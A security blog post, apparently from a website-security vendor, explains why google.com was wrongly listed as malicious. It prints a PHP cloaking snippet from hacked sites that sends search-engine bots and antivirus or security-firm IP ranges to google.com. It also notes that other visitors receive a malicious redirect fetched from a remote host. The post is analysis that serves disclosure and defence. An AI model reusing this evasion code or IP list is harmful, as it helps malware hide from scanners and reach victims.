Flagging google.com as malware

Posted on by Daniel Cid

Yesterday we listed www.google.com as being used for .htaccess conditional redirectionson hacked sites. Google does no evil, so what happened?

We identified the source of the malware, which looks for certain user agents and IP addresses and redirects to www.google.com if it comes from them or to the real malware if not.

This is the code:

$is_bot = FALSE ;
$user_agent_to_filter = array( '#Ask\s*Jeeves#i', '#HP\s*Web\s*PrintSmart#i', '#Safari#i', 
'#HTTrack#i', '#Chrome#i', '#Mac#i', '#IDBot#i', '#Indy\s*Library#',  '#ListChecker#i', 
'#libwww-perl#i', '#Lupa\.ru#i', '#LWP::Simple#i', '#lwp-trivial#i', '#Missigua#i', '#MJ12bot#i',
..
'#msnbot#i', '#msnbot-media#i', '#Offline\s*Explorer#i', '#OmniExplorer_Bot#i',
'#webcrawler#i', '#robozill#i', '#gulliver#i', '#architextspider#i', '#yahoo!\s*slurp#i',
'#charlotte#i', '#ngb#i' ) ; 

$stop_ips_masks = array(
        "66\.249\.[6-9][0-9]\.[0-9]+",    // Google    NetRange:   66.249.64.0 - 66.249.95.255
        "74\.125\.[0-9]+\.[0-9]+",        // Google     NetRange:   74.125.0.0 - 74.125.255.255
        "65\.5[2-5]\.[0-9]+\.[0-9]+",    // MSN        NetRange:   65.52.0.0 - 65.55.255.255,
        "74\.6\.[0-9]+\.[0-9]+",        // Yahoo    NetRange:   74.6.0.0 - 74.6.255.255
        "67\.195\.[0-9]+\.[0-9]+",        // Yahoo#2    NetRange:   67.195.0.0 - 67.195.255.255
        "72\.30\.[0-9]+\.[0-9]+",        // Yahoo#3    NetRange:   72.30.0.0 - 72.30.255.255
        "38\.[0-9]+\.[0-9]+\.[0-9]+",     // Cuill:     NetRange:   38.0.0.0 - 38.255.255.255
        "93\.172\.94\.227",                // MacFinder
        "212\.100\.250\.218",            // Wells Search II
        "71\.165\.223\.134", 
        "70\.91\.180\.25",
        "65\.93\.62\.242",
        "74\.193\.246\.129",
        "193\.164\.202\.166",
        "213\.144\.15\.38",
        "195\.92\.229\.2",
        "70\.50\.189\.191",
        "218\.28\.88\.99",
        "165\.160\.2\.20",
        "89\.122\.224\.230",
        "66\.230\.175\.124",
        "218\.18\.174\.27",
        "65\.33\.87\.94",
        "67\.210\.111\.241",
        "81\.135\.175\.70",
        "64\.69\.34\.134",
        "89\.149\.253\.169",
        "77\.193\.236\.225",
        "84\.155\.170\.196",
        "69\.174\.58\.36",
        "128\.103\.64\.[0-9]+",  // StopBadWare
        "150\.70\.[0-9]+\.[0-9]+",  // TrendMicro
        "216\.104\.[0-9]+\.[0-9]+",  // TrendMicro
        "207\.46\.[0-9]+\.[0-9]+",  // Microsoft
        "157\.55\.[0-9]+\.[0-9]+",  // Microsoft
        "213\.180\.[0-9]+\.[0-9]+",  // Yandex
        "217\.23\.[0-9]+\.[0-9]+",  // Kaspersky
        "91\.103\.64\.[0-9]+",  // Kaspersky
        "215\.5\.80\.[0-9]+",  // Kaspersky
        "195\.168\.53\.[0-9]+",  // NOD32
        "117\.198\.48\.54",
        "110\.77\.248\.135",
        "87\.255\.51\.229",
        "206\.248\.243\.130",
        "124\.115\.6\.[0-9]+",
        "170\.252\.248\.[0-9]+",
        "217\.95\.225\.[0-9]+",
        "203\.17\.34\.[0-9]+",
        "220\.255\.1\.[0-9]+", // domain-tool.com
        "69\.28\.58\.[0-9]+",  // Symantec
        "66\.231\.252\.[0-9]+",
        "126\.15\.99\.[0-9]+",
        "209\.128\.28\.[0-9]+",
        "91\.32\.55\.[0-9]+",
        "208\.72\.12\.[0-9]+",
        "84\.136\.88\.[0-9]+",
        "206\.80\.114\.[0-9]+",
        "24\.4\.75\.135",
        "66\.147\.244\.[0-9]+", // freepcsecurity.co.uk
        "128\.111\.48\.[0-9]+", // wepawet.cs.ucsb.edu
        "209\.9\.239\.[0-9]+", // jsunpack.jeek.org
        "62\.67\.194\.[0-9]+", // support.clean-mx.de
        "195\.214\.79\.[0-9]+", // support.clean-mx.de
        "97\.74\.141\.[0-9]+", // malwareurl.com
        "213\.171\.194\.[0-9]+", // spamhaus
        "139\.146\.167\.[0-9]+", // malwaredomains
        "88\.160\.229\.[0-9]+", // malwaredomains
        "69\.162\.79\.[0-9]+", // malwarebytes
        "66\.40\.145\.[0-9]+", // bitdefender
        "66\.223\.50\.[0-9]+", // bitdefender
        "204\.14\.90\.[0-9]+", // spywarewarrior.com
        "92\.123\.155\.[0-9]+", // Sophos
        "213\.31\.172\.[0-9]+", // Sophos
        "143\.215\.130\.[0-9]+", // Malwaredomainlist
        "150\.70\.172\.[0-9]+", // TrendNet
        "64\.88\.164\.[0-9]+", // AVG
        "102\.157\.192\.[0-9]+", // ZeusTracker
        "109\.65\.41\.[0-9]+", // ZeusTracker
        "110\.77\.248\.[0-9]+", // Virustotal
        "59\.6\.145\.[0-9]+", // Virustotal
        "67\.124\.37\.[0-9]+", // Virustotal
        "80\.190\.117\.[0-9]+", // Virustotal
        "202\.190\.74\.[0-9]+", // Virustotal
        "209\.160\.33\.[0-9]+", // Virustotal
        "91\.121\.139\.[0-9]+", // Virustotal
        "85\.87\.104\.[0-9]+", // Virustotal
        "96\.50\.0\.[0-9]+", // Virustotal
        "220\.225\.0\.52"
    );

foreach ( $stop_ips_masks as $k=>$v )
{
    if ( preg_match( '#^'.$v.'$#', $_SERVER['REMOTE_ADDR']) )
        $is_bot = TRUE ;
}
if ( $is_bot || !( FALSE === strpos( preg_replace( $user_agent_to_filter, '-NO-WAY-', $_SERVER['HTTP_USER_AGENT'] ), '-NO-WAY-' ) ) )
{

header("Location: http://www.google.com/");
die();
}

So, if you are not familiar with PHP, what this code is doing is checking for the user agent of some bots (Googlebot, MSN, Bing, etc) and for a few IP addresses for bots and anti virus companies (Trend, Bitdefender, etc). If the requests arecoming from them, they ignore the connection and redirect to www.google.com.

That\'s why we were seeing www.google.com and listed it on our malware dump (already fixed).

For all the other users (the victims), the malware was contacting http://88.198.28.38/api.php?action=link to get the URL to redirect (generally in the .tk domain). Any questions, let us know.